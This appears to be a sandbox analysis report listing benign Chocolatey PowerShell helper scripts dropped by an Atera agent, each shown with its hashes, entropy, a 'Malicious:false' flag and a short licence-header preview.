                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyWebFile {..<#...SYNOPSIS..Downloads a file from the internets......DESCRIPTION..This will download a file from a url, tracking with a progress bar...It returns the file
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4123
                                                                                                                                                                                                                                        Entropy (8bit):5.288017280806032
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKotzWfp1Vr4MeAWMK13MqhPTv6ee5:cSyL+QGXH3Gp1VrSAQ3Mqg
                                                                                                                                                                                                                                        MD5:E564E914B196DAC040D08110D5D8718D
                                                                                                                                                                                                                                        SHA1:2532E9010D3A67A6FF345F2564A843800DC59CBB
                                                                                                                                                                                                                                        SHA-256:5AF7D3DC6B44142492B9E31A69352873D43D570D7D4718B2942A67D3D6180951
                                                                                                                                                                                                                                        SHA-512:06127E83C2BBDA160183D3DC5E51E652E2011C760B561DA639BDF847F085DB3E93E3C5F0B5C12C1114D228C3882E0FBC81418CF9CAA3C04FA837CE0A68574EFF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariable {..<#...SYNOPSIS..Gets an Environment Variable......DESCRIPTION..This will will get an environment variable based on the variable name..and scope while accoun
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2060
                                                                                                                                                                                                                                        Entropy (8bit):5.165746374691896
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMfcM1KIcoCtJS0RjhYigLiO:cSyL+4pGXHFKovCZWdQ
                                                                                                                                                                                                                                        MD5:D4DF76AC88518CA76BD5EC4605C55781
                                                                                                                                                                                                                                        SHA1:8B540089E4B1AF183CF9D8053043BD4252A8B2BB
                                                                                                                                                                                                                                        SHA-256:F73E30026DC59EF1B1375FE869347BAE2E02BDC51117E17DD2717E7DE7F712F6
                                                                                                                                                                                                                                        SHA-512:BC37855DDEEF6BD3BECA66109F3EBE09B82409DD8EB1B6DEFC1ADCCEA397356FB521BC22CA8B7D34A418EB6EAAC1E9B277CBD333251A149C46E104980FBF3071
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariableNames([System.EnvironmentVariableTarget] $Scope) {..<#...SYNOPSIS..Gets all environment variable names......DESCRIPTION..Provides a list of environment variabl
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7947
                                                                                                                                                                                                                                        Entropy (8bit):5.051645140778019
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:3SfwB1bbVPeBlvvJ5nli61sre8+007Oc+pbkmzqMd0yiW:3SfwHBgPd04OHpb3yW
                                                                                                                                                                                                                                        MD5:15DDE6C604B0BD3A0C1F569BAAC9B91B
                                                                                                                                                                                                                                        SHA1:9366C80608BB20A9CFD84AD574D561E481F9B0B8
                                                                                                                                                                                                                                        SHA-256:12FA2C7D770F0AF308D535A3523903F730A2121B2C72D05A9EA7BF9E5AA27C72
                                                                                                                                                                                                                                        SHA-512:B2DFDC3BC98ADE4486A0CC30E3124F16F9788D6DD8214DF4C6460FE818CFC645EF36FAF03AC99490D0BFEA6A0FDA8646845E9A23C464B13C486E8C8677913339
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.## Get-FtpFile..##############################################################################################################..## Downloads a file from ftp..## Some code from http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell..## Additional functionality emulated from http://poshcode.org/417 (Get-WebFile)..## Written by Stephen C. Austin, Pwnt & Co. http://pwnt.co..##############################################################################################################..## Additional functionality added by Chocolatey Team / Chocolatey Contributors..## - Proxy..## - Better error handling..## - Inline documentation..## - Cmdlet conversion..## - Closing request/response and cleanup..## - Request / ReadWriteResponse Timeouts..##############################################################################################################..function Get-FtpFile {..<#...SYNOPSIS..Downloads a file from a File Transfter Protocol (FTP) l
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2930
                                                                                                                                                                                                                                        Entropy (8bit):5.220783998189862
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-OSArchitectureWidth {..<#...SYNOPSIS..Get the operating system architecture address width......DESCRIPTION..This will return the system architecture address width (probably 32 or
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7233
                                                                                                                                                                                                                                        Entropy (8bit):5.212503071724739
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2016 - 2017 Original authors from https://github.com/chocolatey/chocolatey-coreteampackages..# Copyright . 2016 Miodrag Mili. - https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# special thanks to the Core Community Maintainers team and their work..# on the Get-PackageParameters function that is in the..# `chocolatey-core.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3761
                                                                                                                                                                                                                                        Entropy (8bit):4.908858016895155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ToolsLocation {..<#...SYNOPSIS..Gets the top level location for tools/software installed outside of..package folders......DESCRIPTION..Creates or uses an environment variable that a user can control to..communicate with packages about where they would like software that is..not installed through native installer
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1891
                                                                                                                                                                                                                                        Entropy (8bit):5.216117200464903
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UACEnabled {..<#...SYNOPSIS..Determines if UAC (User Account Control) is turned on or off......DESCRIPTION..This is a low level function used by Chocolatey to decide whether..pro
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6009
                                                                                                                                                                                                                                        Entropy (8bit):5.183782879831246
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UninstallRegistryKey {..<#...SYNOPSIS..Retrieve registry key(s) for system-installed applications from an..exact or wildcard search......DESCRIPTION..This function will attempt to retrieve a matching registry key for an..already installed application, usually to be used with a..chocolateyUninstall.ps1 automatio
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1815
                                                                                                                                                                                                                                        Entropy (8bit):5.188333753523367
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-VirusCheckValid {..<#...SYNOPSIS..Used in Pro/Business editions. Runtime virus check against downloaded..resources......DESCRIPTION..Run a runtime malware check against downloade
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12827
                                                                                                                                                                                                                                        Entropy (8bit):5.065872919066253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:eBbyvHpL71ZxDlVWfYuuiy5nevc/n30zrryM3zE2LoQY+VUqZA:eBgptZxOQt10zrryMFLdYWU6A
                                                                                                                                                                                                                                        MD5:76013037F6A0E623C39D9D07C20D3BAE
                                                                                                                                                                                                                                        SHA1:7DC87082B4D2AB36AB08D6826CA209E2CD7C5694
                                                                                                                                                                                                                                        SHA-256:8FCCA5AA5F0F631FBE9D319EB13C5A282F5DBC1D8D4BC0852021BE0524A6DD39
                                                                                                                                                                                                                                        SHA-512:9D92B42EEBEE276522103D23EF646DFEC32630E97673B816F51841948C6DD9DA89A89B897D515CFFECED7D14174EF83110FFA4B0BA9F64E1738F083592E696F0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# http://poshcode.org/417..## Get-WebFile (aka wget for PowerShell)..##############################################################################################################..## Downloads a file or page from the web..## History:..## v3.6 - Add -Passthru switch to output TEXT files..## v3.5 - Add -Quiet switch to turn off the progress reports .....## v3.4 - Add progress report for files which don't report size..## v3.3 - Add progress report for files which report their size..## v3.2 - Use the pure Stream object because StreamWriter is based on TextWriter:..## it was messing up binary files, and making mistakes with extended characters in text..## v3.1 - Unwrap the filename when it has quotes around it..## v3 - rewritten completely using HttpWebRequest + HttpWebResponse to figure out the file name, if possible..## v2 - adds a ton of parsing to make the output pretty..## added measuring the scripts involved in the command, (uses Tokenizer)..#####################
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9247
                                                                                                                                                                                                                                        Entropy (8bit):5.07010917787166
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSypQGXHQybOdQVeBAmZZ8mumtrUy5nF2wnK0u/obu5OyDucYhr:ctpQG3G1vPS0uQZ2uH
                                                                                                                                                                                                                                        MD5:CCEF9317BA6E4AD2C5F9ADA169DE64E3
                                                                                                                                                                                                                                        SHA1:0B03F562CC75CDFB7CC184DA8B8E6BA73A6256A7
                                                                                                                                                                                                                                        SHA-256:1D10AEC25CE4A010B338041862F485BDA47494A3A0EE154BBA49F48BCFCF0D68
                                                                                                                                                                                                                                        SHA-512:922BCEFDCC76A32EE81AB0610BA1E256A228075084DE5A85F11D3B67D62F496A86BD59BE3AA5E00EC24E5A2805AD4199D5D38CD05D92D1BBC43F333FBE924D30
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License...#..# Based on http://stackoverflow.com/a/13571471/18475....function Get-WebFileName {..<#...SYNOPSIS..Gets the original file name from a url. Used by Get-WebFile to determine..the original file name for a file......DESCRIPTION..Uses several techniques to determine the original file name of the file..based on the url for the fi
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5960
                                                                                                                                                                                                                                        Entropy (8bit):5.140316008573171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKovnYWHVjmlvr79s5nFUFwlmiZn28HeheXeGYDXSqVR2vRtktvS:cSyL+QGXH2QVqlvr7y5nFDXnw0ud3Q
                                                                                                                                                                                                                                        MD5:510D813D8B844FA9ABCF1CF8B294CE83
                                                                                                                                                                                                                                        SHA1:B733C7BC5B1EA00C27895DE8BFB337183D9335E1
                                                                                                                                                                                                                                        SHA-256:58C4E3DE6F018A33E4952AF35EFCCC0B688F1170F733CC10E2C32A33F11A9123
                                                                                                                                                                                                                                        SHA-512:3D3DA339A6B9CAC75CB940B573703BBA5782D22918637D4399636F0F2787436920D6965F2165E294C68107905D556F115CD8416C97A18B12B7F0207CD7721AAC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-WebHeaders {..<#...SYNOPSIS..Gets the request/response headers for a url......DESCRIPTION..This is a low-level function that is used by Chocolatey to get the..headers for a reque
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6283
                                                                                                                                                                                                                                        Entropy (8bit):5.232086061865062
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHN0Vk7arlCnBVV+7oc9KYjWndTmw:ctL+QG05rlwguh
                                                                                                                                                                                                                                        MD5:5617A2B6826D73A80E864B42A3404E72
                                                                                                                                                                                                                                        SHA1:61522560BF997DD79C6649F0C1D198510E19430F
                                                                                                                                                                                                                                        SHA-256:9FC392C4558C2579517F24D945D8E1741EB4A5D7893E4E2DCA6CA756443AB328
                                                                                                                                                                                                                                        SHA-512:B4EA54386B427AC314854AE3584EBF7AEB9E178026346917B05249A28CF831FBD7F87D12CCF56F00DA9C4F55ABC7324E69C4AB9B367258AC2F35960BAFEFADF3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-BinFile {..<#...SYNOPSIS..Creates a shim (or batch redirect) for a file that is on the PATH......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\b
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4293
                                                                                                                                                                                                                                        Entropy (8bit):5.147557599553147
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKooCb/InyxVkR8PIoIxAETBXSYG:cSyL+QGXHeCjIGVo8qXSYG
                                                                                                                                                                                                                                        MD5:06FC3CDC03EC16E85CE73D558D58742B
                                                                                                                                                                                                                                        SHA1:C73F95322D853B964AD241CD9B1EFD1A6AF8B101
                                                                                                                                                                                                                                        SHA-256:E6E24F83FDA53709F7EA93F73533314156F1DA0B028FC7BD063BA1720D1A6ADA
                                                                                                                                                                                                                                        SHA-512:A1BB72C33CC1544432B6E4A3317843331ECB70D954DBFC195A3A6AD3FDF18280F807BF2A9DEC06D036111A46062EE04A87C2D315F4E895D2C7F2DAAF6B4CB48A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Creates a persistent environment variable......DES
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4549
                                                                                                                                                                                                                                        Entropy (8bit):5.216765809932499
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKobx0W2Pq44GGVq/r6ck8Tr6ck012gMe5RDJRmR0GRSd:cSyL+QGXHBx03x4rVqDQ8vQubL5HItUd
                                                                                                                                                                                                                                        MD5:D283FDF0627E77F4745CE26CBB134DDB
                                                                                                                                                                                                                                        SHA1:D41419D3F8DC3F22B37E5CDE1090CF19879F8466
                                                                                                                                                                                                                                        SHA-256:C4292F8767BD7E74E85C4AABCDB9EB0ED3B564693AAC1F568EB02FF7529DF027
                                                                                                                                                                                                                                        SHA-512:A14822AEC4351C106325F1403F79DF444CB53C03CB09AE0FF15169CEC821102A11186B321F9FE8CEFC35932FE02A874E984EECADDA3EC5DCA52AB7EDEE9DB1F4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyExplorerMenuItem {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates a windows explorer context menu item that can be associated with..a command.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3080
                                                                                                                                                                                                                                        Entropy (8bit):5.192518177403395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoognbqHdyVO6ckUf1eg9DgH:cSyL+QGXHqgnydyVOQUf1eg9DgH
                                                                                                                                                                                                                                        MD5:44D634D52E391B61FEA2B3311FD130C4
                                                                                                                                                                                                                                        SHA1:AC5184FA6552AD3D2D58EBD53563ED3238E089FF
                                                                                                                                                                                                                                        SHA-256:22FA3870EC2455426BD2BA94B5DC82C241D16F1DBD1AC6979787E947B39563AE
                                                                                                                                                                                                                                        SHA-512:53F5C0D5865DA75816B663CDD4279938401498416A2AD4FD4A7667CC93042D4FBCBC7B2F2F1FD3864CFADBC73908730C6EC7761A77207511861CB277AF8DBF59
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyFileAssociation {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates an association between a file extension and a executable......DESCRIPTION..In
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14313
                                                                                                                                                                                                                                        Entropy (8bit):5.166123502608628
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctL+QGm9UIirNuMyrnyBOXOrH2ZoBZiLtM+h1yBPSa:ctL+yG9PKQaOyaBEl1+PSa
                                                                                                                                                                                                                                        MD5:7BB19403672F88442C8510579DEEA62B
